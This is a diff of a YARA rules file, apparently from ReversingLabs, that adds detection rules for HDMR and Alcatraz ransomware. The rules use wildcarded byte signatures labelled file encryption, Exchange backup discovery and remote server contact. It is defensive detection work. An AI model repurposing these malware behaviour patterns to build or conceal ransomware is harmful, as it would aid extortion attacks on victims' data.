-		logic_hash = "6de16a44bc84fbf8f1d3d82526e1d7f8fd4ae3da6deaa471c77d2c8df47a14b0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.HDMR.yara#L1-L161"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "035c6596db8dc14a663679c1f7e682b85963927cc034b01e390cc22fdee3334a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HDMR"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 8B 75 ?? 57 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 74 24 ??
+            66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ??
+            ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB
+            ?? 8D 49 ?? 8B 74 24 ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ??
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8D 44 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83
+            C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
+        }
+		$find_files_p2 = {
+            54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4C 24
+            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24
+            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 68
+            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 54 24 ?? 68 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D
+            8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52
+            56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83
+            C4 ?? 85 F6 74 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            8B 0D ?? ?? ?? ?? 83 C4 ?? 3B 0D ?? ?? ?? ?? 7C ?? 8D 49 ?? 6A ?? FF 15 ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? FF D7 FF 05 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF D3 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D
+            C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 33 C0 8B D9 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 5C 24 ?? 66
+            89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BF ?? ??
+            ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ??
+            ?? 83 C6 ?? 83 C7 ?? 81 FE ?? ?? ?? ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51
+            53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 8C ?? ?? ?? ?? 8B
+            7C 24 ?? 7F ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B F0 89 7C 24 ?? 89 74 24 ?? 85 C0 7C ??
+            7F ?? 83 FF ?? 76 ?? 6A ?? 6A ?? 6A ?? 53 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            33 C0 50 8D 54 24 ?? 52 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 88 44 24 ?? 6A ?? 8D
+            44 24 ?? 50 53 C6 44 24 ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C7 83 E8
+            ?? 8B CE 83 D9 ?? 33 F6 39 44 24 ?? 75 ?? 3B F1 75 ?? 8B 4C 24 ?? 3B 0D ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 C6 44
+        }
+		$encrypt_files_p2 = {
+            24 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ??
+            ?? ?? ?? 40 88 44 34 ?? 46 83 FE ?? 7C ?? 8B 44 24 ?? BE ?? ?? ?? ?? 85 C0 0F 8F ??
+            ?? ?? ?? 0F 8C ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 85 C0 0F 8C ?? ?? ??
+            ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 85 C0 7F ?? 7C ?? 3B FE 73 ?? 6A ?? 6A ?? 50 57 E8
+            ?? ?? ?? ?? 8B F7 2B F0 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44 24
+            ?? 3B F8 74 ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 74 24 ??
+            75 ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 8D 4C 24 ?? 51 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ??
+            ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83
+            C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 68 ?? ??
+            ?? ?? 50 57 E8 ?? ?? ?? ?? 8B C8 89 44 24 ?? B8 ?? ?? ?? ?? F7 E9 C1 FA ?? 8B C2 C1
+            E8 ?? 03 C2 69 C0 ?? ?? ?? ?? 8B D1 2B D0 85 D2 7E ?? 41 89 4C 24 ?? 33 C0 89 44 24
+            ?? 3B C8 0F 8E ?? ?? ?? ?? 89 44 24 ?? EB ?? 90 8B 7C 24 ?? 8B 44 24 ?? 8B 4C 24
+        }
+		$encrypt_files_p3 = {
+            99 2B F8 1B CA 89 7C 24 ?? 89 4C 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ??
+            ?? 8B C6 99 3B CA 7F ?? 7C ?? 3B F8 73 ?? 6A ?? 6A ?? 51 57 E8 ?? ?? ?? ?? 8B F7 2B
+            F0 85 F6 0F 8E ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44
+            24 ?? 3B F8 0F 84 ?? ?? ?? ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 39 74 24 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B CE F7 D9 51 53 FF 15 ??
+            ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 52 56 57 53 FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7C
+            24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 8B 44 24 ?? 81 44 24 ?? ?? ?? ?? ?? 40 89 44 24 ?? 3B 44 24 ?? 0F 8C
+            ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? 85 FF 74 ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 68
+        }
+		$encrypt_files_p4 = {
+            8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D
+            74 24 ?? 8D BC 24 ?? ?? ?? ?? F3 A5 8B 4C 24 ?? 6A ?? 89 8C 24 ?? ?? ?? ?? 8B D0 8D
+            4C 24 ?? 51 C1 FA ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 52 53 C7 44 24 ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 94 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 5F 5E
+            5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 8B 8C
+            24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_MS_xchange_backups_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ??
+            8B 1D ?? ?? ?? ?? B0 ?? 88 44 24 ?? 88 44 24 ?? B0 ?? 83 C4 ?? C6 44 24 ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 88 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C6 44 24 ?? ?? 88 44 24
+            ?? 88 44 24 ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B FF 68 ?? ?? ?? ?? 8D 8C 24
+            ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 54 24 ??
+            52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 6A ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 D2 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ??
+            8D 44 24 ?? 50 8D 4C 24 ?? 51 52 52 52 52 52 52 66 89 54 24 ?? 8D 94 24 ?? ?? ?? ??
+            52 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 6A ?? FF D7 83 C6 ??
+            FF 4C 24 ?? 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D 49 ??
+            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 C6 84 24 ?? ?? ?? ?? ?? E8
+        }
+		$find_MS_xchange_backups_p2 = {
+            83 C4 ?? 56 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 6A
+            ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 C9 8D 54 24 ?? 52 89 44 24
+            ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 51 51 51 51 51 51 66 89 4C 24
+            ?? 8D 8C 24 ?? ?? ?? ?? 51 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
+            D3 6A ?? FF D7 83 C6 ?? FF 4C 24 ?? 0F 85 ?? ?? ?? ?? 33 D2 68 ?? ?? ?? ?? 52 8D 84
+            24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 B1 ?? EB ?? 8D 49 ??
+            30 88 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ??
+            51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
+            ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 8D 4C 24 ?? 51 8D 54 24 ?? 52 50 50 50 50 50 50 89 44 24 ?? 89
+            44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC
+            E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Syncode Sistemas e Tecnologia Ltda" and ( pe.signatures [ i ] . serial == "00:e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" or pe.signatures [ i ] . serial == "e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" ) and 1373932799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $find_MS_xchange_backups_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1A0Fd2A4Ef4C2A36Ab9C5E8F792A35E2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Alcatraz : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Alcatraz ransomware."
 		author = "ReversingLabs"
-		id = "7148a21a-97d6-59a2-a1cf-442c271bc0b5"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7ff37483-ae63-5c82-a355-81ef68e2f663"
+		date = "2020-07-28"
+		modified = "2020-07-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2654-L2670"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8e768415998a6a92961986cb0a9d310514d928be93b3e5a9aaa9ec71bf5886ad"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Alcatraz.yara#L1-L91"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ddd35c8da0c08bce17cacfba8bb8a8b8a8c08c3e59261a88a79c63b03d29000f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Alcatraz"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9
+            ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ??
+            ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75
+            ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ??
+            ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 D0 85 D2 75 ?? 83 7D ?? ?? 74 ?? 6A
+            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            75 ?? 83 C8 ?? EB ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ??
+            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_server = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D
+            ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83
+            7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 C2 ?? 52 6A ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B
+            55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 4D ?? 0F BE 11 83 FA ??
+            74 ?? 8B 45 ?? 03 45 ?? 0F BE 08 83 F9 ?? 74 ?? 8B 55 ?? 03 55 ?? 8B 45 ?? 03 45 ??
+            8A 08 88 0A EB ?? 8B 55 ?? 03 55 ?? C6 02 ?? EB ?? EB ?? EB ?? 83 7D ?? ?? 0F 87 ??
+            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52
+            FF 15 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_server_2 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 89 45 ?? A1 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52
+            A1 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 0D ?? ?? ?? ?? 51 68
+            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ??
+            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 68
+            ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 55 ??
+            52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
+            45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8B 55 ?? 83
+            C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33
+            C0 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33
+            C0 EB ?? EB ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8B 4D ??
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 0F 87 ??
